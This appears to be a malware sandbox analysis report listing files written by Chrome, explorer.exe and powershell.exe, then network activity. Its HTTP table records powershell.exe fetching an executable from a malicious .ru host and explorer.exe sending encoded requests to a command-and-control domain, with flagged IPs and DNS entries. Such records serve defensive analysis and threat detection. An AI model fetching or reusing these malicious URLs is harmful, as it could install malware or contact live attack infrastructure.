SHA256: b46edb840051e0ef747df157e0d6c244910a638135ff44663f6f06fe519e5d87
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014
image
MD5: e60bcada6ed92b63ff45cc3420790603
SHA256: 6c4a8006b060fcbb2016433913a1942b7af1d9a24a7f97892556d393d34da908
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013
image
MD5: a1db1e1efe621ae8fa6f1645343ae697
SHA256: 5065fec74672d9f6f4cb9981cab13af3799c6f9b0ecef23fc65bd5d065d20501
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012
image
MD5: 7512c3272e86b2e570e47fba1cb53ecb
SHA256: f248122027342bf3c766394e1b8187f89409b7e091fde99eab21163a8786613a
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011
image
MD5: 5561febab95a9456ac2383ad9ad3f402
SHA256: bd1a623389ecf52b63c81ae0a825e52416d82cb7872005abf44d07ff10ed6555
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010
image
MD5: aac5eb27f350c8f62668ff986cef2c02
SHA256: f5c1440cf6504aaa8ac3aeda24ce4626a97543862957c932471de390117100aa
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 9e79eff3958f9a7449064096be67b4c4
SHA256: 1954eb49d9997b87b2adc6ecc0be2763bc653a779220f840b4bc2ebd8a10b093
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF13a0e7.TMP
text
MD5: 9e79eff3958f9a7449064096be67b4c4
SHA256: 1954eb49d9997b87b2adc6ecc0be2763bc653a779220f840b4bc2ebd8a10b093
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f
image
MD5: bdd3e3fdfe59eb1342279c994f261d65
SHA256: 6e773f27684aedceedf54fcc4248f77ccead39fc3215f3b74e51a75fd613fe88
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\3fa11228-e397-400a-a23e-88a37dfdedbc.tmp
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e
woff2
MD5: e999982e8f307ebeaadb0287bcf7b86c
SHA256: 5564e6567fdd572ec93049df67ea8c48406d27500b422742501a412c3b295913
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d
woff2
MD5: e4f6fea4312b740016ac2d2cb8dde51d
SHA256: ac61df79556a2cfc8cb1c01502394a8ff3fff7f2296aeb1f01087dcd221a09c6
3016
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir4068_1399\CRX_INSTALL\manifest.json
text
MD5: aa820edca2a1d86c3b0a259f28cd4b6c
SHA256: 0cb121b2c53dee18adedc1fa004ca640c88644fd75c5f062ce749401f96ebf49
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c
woff2
MD5: 23c11be15c6c119449e9bb4e9096c9dc
SHA256: 4ff6dbfb865d4ed19a9fafe2cddc21919974e8329f4503fe47cbe1fb66b97bd0
4068
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir4068_1399\b6854ecf-e455-4750-b414-9f43ca2e2ff7.tmp
crx
MD5: c9f1737667f13e06aa8cfb26416cd7f9
SHA256: d9a59c97ed4b1dc1c15ce3136afc93fc45d7a2253f7e9e26100f35499f3e94bf
4068
chrome.exe
C:\Users\admin\AppData\Local\Temp\9a20900b-f05b-4d0e-a7d7-4c0d779d5e5f.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Temp\b6854ecf-e455-4750-b414-9f43ca2e2ff7.tmp
crx
MD5: c9f1737667f13e06aa8cfb26416cd7f9
SHA256: d9a59c97ed4b1dc1c15ce3136afc93fc45d7a2253f7e9e26100f35499f3e94bf
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b
image
MD5: eeb1a3e062434c40fad0ecc5072e007e
SHA256: dc080b0e34f0579c2b66c068ec7cc20715b66fb1dbba78686999bfb52d35c6b8
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\df2db86ec0c3b16d_0
binary
MD5: 85617e9095499b9fbd25f4968c218213
SHA256: 1de23d88f6dc7ad43eb370224fd8dc18a6900b43cb329172bff7e7128651a13d
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a
compressed
MD5: 01d5892e6e243b52998310c2925b9f3a
SHA256: 7e90efb4620a78e8869796d256bcddbde90b853c8c15c5cc116cb11d3d17bc4d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\86bc945c7598660a_0
binary
MD5: 21d48eb3de7e795d1a5a75306f8727c7
SHA256: 42cecba1507e5340fda0d80bfdf235c2f001d5cc15097fb2156069fad1fc2cea
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009
compressed
MD5: ceaabf5d9408941a1ae8b2728d25ba75
SHA256: 49462e00758c8eaa4668077c5ba5ac5830c86c0cefdce5eed5900d1dd638a223
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3901609b02e7e668_0
binary
MD5: d1ed237e4de97a6c69c5301879df5436
SHA256: 2262379f4417ffdd7f70aeb7a378285dc85e4ede726616b8afca09f60ec0e078
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008
compressed
MD5: 80b28f74adf2f7a4cc8f0aed4291d238
SHA256: 19b24304c44354af8d56604e2b9caa6317af7abc5d1eba3d9d0f0e2c2e5a2818
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT
text
MD5: 46295cac801e5d4857d09837238a6394
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000001.dbtmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001
binary
MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF139b39.TMP
text
MD5: 5e7acb1b2ce6bfe62646d0787a6ad932
SHA256: 67172f5d723512fea640763840cac35f044a3c2233472b6c3b06a8ddbae18478
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 5e7acb1b2ce6bfe62646d0787a6ad932
SHA256: 67172f5d723512fea640763840cac35f044a3c2233472b6c3b06a8ddbae18478
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\dc2fcb4c-fa8e-43c3-a504-259b5c5152f6.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: d4c1a68839786fb835091603b7892c06
SHA256: ce74c24aeb39d156f1c412b8e33a8372233e7a60dc5a44eb397843ace75031c2
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF139aeb.TMP
text
MD5: d4c1a68839786fb835091603b7892c06
SHA256: ce74c24aeb39d156f1c412b8e33a8372233e7a60dc5a44eb397843ace75031c2
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ada2c929-fd1b-4bd2-9d4f-08dfcdeecc34.tmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\bd2ac9401e71e2d5_0
binary
MD5: 07002dd474979e0f145dd593bc57b848
SHA256: c336cc968a292dc1b0d8e3dcd90e8c7bf17fad87ea093efae550ae42d75b4bc8
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\bd2ac9401e71e2d5_1
binary
MD5: 8025bc845e91fa1ed201ade9310b97a2
SHA256: 3af0c78d60ed40eba2a2684c9ecb08b3648f1438888e09bd2a12cf06ef89002b
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\5ca50924ce3c5c59_0
binary
MD5: 699b4a0389f6887cd01663f992829578
SHA256: 53240c5930f89e41510447f83f084f2adcbf684df01aeb63066cd5f5f9e7f5b3
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007
binary
MD5: bd4069172df7d5a945a19b8d2e0e49e5
SHA256: 61e0cb7719f55452d9d1d8b6818f6441c83515a3bbcc79f548ee86fc5b2fed2f
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\index.txt
binary
MD5: 692078506c2f0c51b1e2f23be780592c
SHA256: c6dfbb5e19234f26339b355b47c17bdfcabb4f3cc88d0840ed3299cb7234fcb0
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\index
text
MD5: 54cb446f628b2ea4a5bce5769910512e
SHA256: fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\23be1dad-5899-45d1-bae2-2f8febf9efa1\index-dir\the-real-index
binary
MD5: 190dfc4a094b8eb56aec554b5d34b75b
SHA256: 70e30813d936d8d473100bfcfbf882e3b7b8025c2059eed09e6f9324a3995210
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1
binary
MD5: 18eae7f2e8cea5a679dc897b8b098285
SHA256: d6d48c1695da3bab6830de33d3674c77b84c3bb2c2dae3a6a03eb23d74a18b95
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0
binary
MD5: 4b0c7d17cf2a4304d78b7dc837b1ba90
SHA256: b715e5e67004ae0d1ee3b7b7567a9bc5b7044b4fe5f283b6d903363e572ee645
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
binary
MD5: 7a8d648d8f478929b3c0ecadabab87b7
SHA256: 5791f7d3731b3dd2a6a6cb86aca67274179c6eab8eb352544f03e7bb13c0072a
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
text
MD5: 46295cac801e5d4857d09837238a6394
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000001.dbtmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001
binary
MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index
text
MD5: 54cb446f628b2ea4a5bce5769910512e
SHA256: fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3955322a5755d8d3_0
binary
MD5: fb26213bb9c4798fcad414e7df400856
SHA256: b2eb76106c20ece96fd2fed9d135c29f296b5a36bc9e4211c26f25c460e0aba0
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006
compressed
MD5: add5bb80416c26f7c28719e958358b3f
SHA256: a306c0648ad5677440b32ea320034994f934eb02df8bdd75c27f6bf785fefc20
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\aa3abbe71413e7c4_0
binary
MD5: de24c03510d2d261a9a38d13dc0a7de7
SHA256: 7c4710a9f3751ed1fe1c59df1aa6e97c57e7d319dc5f69fc176f4d170faf6122
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005
compressed
MD5: 48c4122ac24d3c0c953d9ac1c6dc5184
SHA256: 3e8670ecfba8bab1d76360c14604dec69552c444bba055269aed30d973587892
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT
text
MD5: 46295cac801e5d4857d09837238a6394
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000001.dbtmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001
binary
MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004
image
MD5: 7941e62d27d42b5960029cffb4fada3b
SHA256: 7ca40d7689200cec17f9c2c2f64e9a76590fe894a760545dcdde0a27820e7e2f
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003
binary
MD5: f673f505c74a96cfdd6baa486cf60753
SHA256: 94c0a16bbd5a0939541ad710e61803c4834b52b74bc628f9eabf5ad9d004e6c3
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\9cbb2d28459bc049_0
binary
MD5: 215354d232002f1cc667d62a43c0e5c0
SHA256: 4300bb2f4585c8395b0519029d049c625c4ac3841e957968ff6493546e8d045a
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.com_0.indexeddb.leveldb\CURRENT
text
MD5: 46295cac801e5d4857d09837238a6394
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.com_0.indexeddb.leveldb\000001.dbtmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.com_0.indexeddb.leveldb\MANIFEST-000001
binary
MD5: 3fd11ff447c1ee23538dc4d9724427a3
SHA256: 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\94854a4d2cc11b03_0
binary
MD5: ff364e505daa94d4e865d59e0c508fd3
SHA256: 61d32771dbafbf9c025c06e4ec9458596c37bf784368372950af687fde97853c
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002
compressed
MD5: 4f0f603a74d03043125376621159870e
SHA256: e72868e36a01ddf3394e2026eb1bdef44e11d0d8c996c0c7211b3d4ea6bd053c
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8a292ed2628c7128_0
binary
MD5: 55927b8a904728d1033482b8d040ace6
SHA256: 3bcbe0a86947306f6c1cccbebd961ec04adcc80d404ea572e26eb0f75607d758
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001
binary
MD5: 47ecad75a3e3e563b811bc7783dd885a
SHA256: 06e02798a8b5305f56de69479f29094a63b2893908cef2dc94c0691a29dc5038
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old~RF137a25.TMP
text
MD5: 1c2c4bb805e49e0719deef84894dbb1f
SHA256: 1afb26b8e579f076590e61bb63648bb0230fee4516c08ebe588dfc31efd616da
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
text
MD5: 1c2c4bb805e49e0719deef84894dbb1f
SHA256: 1afb26b8e579f076590e61bb63648bb0230fee4516c08ebe588dfc31efd616da
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
text
MD5: 1b8036252b09dda7ad0963a5a40e4aba
SHA256: 89e90f5dc88f667b89afa57d04c939a3c7397bb98b9d259766fa452ec297ec06
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF1379e6.TMP
text
MD5: 1b8036252b09dda7ad0963a5a40e4aba
SHA256: 89e90f5dc88f667b89afa57d04c939a3c7397bb98b9d259766fa452ec297ec06
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
binary
MD5: f50f89a0a91564d0b8a211f8921aa7de
SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0
––
MD5:  ––
SHA256:  ––
3564
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\index
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
text
MD5: 904754a73eb4f8a75410a92b2b7a920c
SHA256: c3225bb8babf9823a2daf2bccae0cafc5d3e0857c5f24187dc004f1b2560b4db
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF1374f5.TMP
text
MD5: 904754a73eb4f8a75410a92b2b7a920c
SHA256: c3225bb8babf9823a2daf2bccae0cafc5d3e0857c5f24187dc004f1b2560b4db
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\af34421e-18b1-47e0-899b-c37c3dd91002.tmp
binary
MD5: 5058f1af8388633f609cadb75a75dc9d
SHA256: cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF1374a6.TMP
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
text
MD5: 768258eee3510091c97ade3bca3dc828
SHA256: 1f00cceba22a3fa7d0fffdebb99b95f0dfe19d2cda162abc09fc0d8a6e8ff21d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old
text
MD5: 70f27bb5ff84782e8065f81ee64e6008
SHA256: fd5dd0c6f1056c6ee6c2d29bd31653abb589e7d528957942e65b3972b7ecb4e9
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF137468.TMP
text
MD5: 768258eee3510091c97ade3bca3dc828
SHA256: 1f00cceba22a3fa7d0fffdebb99b95f0dfe19d2cda162abc09fc0d8a6e8ff21d
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old
text
MD5: 007e2c8f160468cc5a8b6c225f0ac40c
SHA256: 7f09cf7ac785c12f0062eb23854505c4ed396c6522eca7109b43ad5cc1a5f74b
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Version
text
MD5: f679598350690f14a2479935d826682b
SHA256: 4e7e1987eaf5ec751eb16b9f7cbae1c55873f1afe8e2b52416ed454f4efbf239
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
binary
MD5: 9c016064a1f864c8140915d77cf3389a
SHA256: 0e7265d4a8c16223538edd8cd620b8820611c74538e420a88e333be7f62ac787
252
explorer.exe
C:\Users\admin\AppData\Local\Temp\5D74.bin
compressed
MD5: 59a2e037b9b570508efa7b12bb16c31c
SHA256: f24e1bcf5092913c03075bfbe3332db36f6efd215fb1508bf86b57904ce57920
252
explorer.exe
C:\Users\admin\AppData\Local\Temp\47CB.bin
––
MD5:  ––
SHA256:  ––
2208
cmd.exe
C:\Users\admin\AppData\Local\Temp\B3F2.bi1
––
MD5:  ––
SHA256:  ––
3052
cmd.exe
C:\Users\admin\AppData\Local\Temp\B3F2.bi1
––
MD5:  ––
SHA256:  ––
252
explorer.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
text
MD5: 70ca454c915fef80e1cb1551debf1712
SHA256: b4e4cadae75f0726bfa923467ab414f323d81a90404bd0a356cc7c4158536653
3704
TempoZg18.exe
C:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
binary
MD5: 0257a071b2298fb24719232f3fe14373
SHA256: 950b7aa9ad1f41f8a301ac3c3540617e7e6851a97a82c31fdae98283c696fb36
4056
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 5f9a7bf5388376d94c2edca422810bec
SHA256: 8b2183f4f2f735c231b1f81d46cb86cb1fb51168824de82f3a9ea79c12caf82c
4056
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF131b3c.TMP
binary
MD5: 5f9a7bf5388376d94c2edca422810bec
SHA256: 8b2183f4f2f735c231b1f81d46cb86cb1fb51168824de82f3a9ea79c12caf82c
4056
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9TZ1TIVKGYST00QHAM1O.temp
––
MD5:  ––
SHA256:  ––
4068
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
text
MD5: f485024f3954f4f35c7e1b304ce27c8d
SHA256: 54d3323b4ba583108c545839a8cca995a3b2bf5aee7664bd39161313c1bfdf79

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
5
TCP/UDP connections
42
DNS requests
23
Threats
13

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
4056 powershell.exe GET 200 181.39.233.180:80 http://instant-payments.ru/read.exe EC
executable
malicious
252 explorer.exe GET –– 194.204.25.137:80 http://adonis-medicine.at/images/aAAXdjNd8XFYE7CaRQTIX/k47qGr7P4TmBYYAb/poeZNnhNek34dZI/9iH_2F2lVRlGJ9z27P/OgzxQ_2BV/wmsKWs6ShjmiGV6_2F68/Q0oPnxXsFt3H5TZuC9h/GD6FuSakOaFgzeoOibWbh9/CpKsrTgFQQPFg/LzTibgwe/dGQcRDvjnLo_2Bj_2B_2B2B/GjCIsClVgH83MkfIfa/E1.gif EE
––
––
malicious
252 explorer.exe POST –– 194.204.25.137:80 http://adonis-medicine.at/images/95UWeuAUyI4VZnuZf05ZJ_/2BfCu5IqaGkXg/xoT2s2NE/URLUS9QDe_2Ff1RPIbHnzeH/RZsaZp612j/nTepBXIJBrBuQNcbS/hjOLIkmV8EEK/NfPTFCI7ccO/fgEXHEcUvQ4VjP/dnn_2B_2FovY0GBSrlIb1/gxcOpwqn9azMzq3u/TJvV_2BfKvoJR73/f21YxSnUBLLh2MEz3E/gJ2E0wDne/KGPgJF9d_2B46/lPHq.bmp EE
binary
––
––
malicious
3564 chrome.exe GET 302 172.217.16.206:80 http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx US
html
whitelisted
3564 chrome.exe GET 200 194.9.24.113:80 http://r6---sn-5uh5o-f5fd.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=212.7.217.54&mm=28&mn=sn-5uh5o-f5fd&ms=nvh&mt=1555293801&mv=m&pl=21&shardbypass=yes PL
crx
whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
4056 powershell.exe 181.39.233.180:80 Telconet S.A EC suspicious
2940 nslookup.exe 208.67.222.222:53 OpenDNS, LLC US suspicious
252 explorer.exe 194.204.25.137:80 Elisa Eesti AS EE suspicious
3564 chrome.exe 216.58.205.228:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.22.35:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.16.141:443 Google Inc. US unknown
3564 chrome.exe 216.58.206.14:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.21.227:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.18.3:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.18.14:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.16.206:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.16.206:80 Google Inc. US whitelisted
3564 chrome.exe 172.217.22.8:443 Google Inc. US whitelisted
3564 chrome.exe 194.9.24.113:80 ATM S.A. PL whitelisted
3564 chrome.exe 172.217.16.202:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.23.163:443 Google Inc. US whitelisted
3564 chrome.exe 172.217.23.129:443 Google Inc. US whitelisted
3564 chrome.exe 74.125.71.154:443 Google Inc. US whitelisted

DNS requests

Domain IP Reputation
instant-payments.ru 181.39.233.180
186.87.135.97
89.45.19.18
62.73.70.146
91.201.175.46
194.204.25.137
86.101.230.109
80.80.165.93
84.54.187.24
196.20.111.10
malicious
11totalzaelooop11.club No response unknown
resolver1.opendns.com 208.67.222.222
shared
222.222.67.208.in-addr.arpa No response unknown
myip.opendns.com 212.7.217.54
shared
adonis-medicine.at 194.204.25.137
86.101.230.109
80.80.165.93
84.54.187.24
196.20.111.10
181.39.233.180
186.87.135.97
89.45.19.18
62.73.70.146
91.201.175.46
malicious
clientservices.googleapis.com 172.217.22.35
whitelisted
www.google.com 216.58.205.228
whitelisted
accounts.google.com 172.217.16.141
shared
clients1.google.com 216.58.206.14
whitelisted
ssl.gstatic.com 172.217.21.227
whitelisted
www.gstatic.com 172.217.18.3
whitelisted
